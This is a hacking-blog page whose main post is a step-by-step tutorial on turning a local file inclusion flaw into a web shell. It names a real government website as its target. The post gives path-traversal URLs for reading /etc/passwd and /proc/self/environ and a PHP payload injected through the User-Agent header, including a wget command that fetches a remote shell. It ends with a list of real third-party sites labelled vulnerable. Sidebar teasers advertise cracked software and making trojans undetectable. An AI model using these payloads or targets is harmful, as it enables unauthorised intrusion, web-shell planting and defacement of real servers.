• Server Hacking

    Finally i am releasing Server Hacking video with the script for all my readers who have been waiting from some time for this... Your wait is over here it is

  • How To Hack - /cgi-sys/suspendedpage.cgi ~ Video Tutorial

    Many times you found that hacker posts the deface index with "/cgi-sys/suspendedpage.cgi" link e.g. www.site.com/cgi-sys/suspendedpage.cgi So, today we will learn how to do this..

  • |IDM 6.10 + PATCH

    Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive....

  • Root and Unroot Android Phone

    Getting the ROOT of the rights and removing them to the Galaxy Ace Samsung GT-S5830 IRoot Instructions for obtaining the right. ...

  • FUD Your Trojan

    File splitter to split our servers to find out where the virus signature is to modify it. ...

LFI TO SHELL TUT

Posted by Anonymous On 23:53 No comments


Things you will need:

1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/ )
4) Mozilla Firefox

First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)

Try to open etc/passwd

Example:
Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd

Ok fine...We can open etc/passwd

Now type proc/self/environ

Example:
Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ

Now download and install User-Agent switcher.

Go to Tools > Default User-Agent > Edit User Agents
You will get this window.


Now make new user-agent
Go to New > New User-Agent

You will get something like this:



Now leave everything as it is exept description and user-agent.
In description enter name of it (Mine is phpinfo)

In User-Agent paste this in there.
Code:
<?php phpinfo();?>

Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

Go to your site and refresh it.

You should get something like this in your site.


Now search for "disable_functions" (Ctrl+F Search function)

Mine is
Code:
disable_functions     | no value    | no value

That is good.We can spawn our shell now!

Now go back and edit your User-Agent.

Change "User-Agent" to:
Code:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

(What this function do?. It downloads shell in .txt format and renames it as shell.php)

Save it and refresh your site.

Go to http://www.yourLFIsite.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila,we have our shell up.
Enjoy.
TEST SITES

http://hwcf.com.pk/golf/index.php?page=....lf/environ
http://www.lrh.gov.pk/Nursing_School/ind...lf/environ
http://www.aladde.org/index.php?load=../...lf/environ
http://www.findinsl.com/index.php?load=....lf/environ
http://www.holzprof.ee/index.php?action=...lf/environ
http://www.bislig.gov.ph/content1.php?pa...lf/environ
http://www.tendokarate.no/index.php?page...lf/environ
http://www.cranberries-gifts.co.uk/categ...lf/environ

Categories: , , , ,

0 comments:

Post a Comment

Site search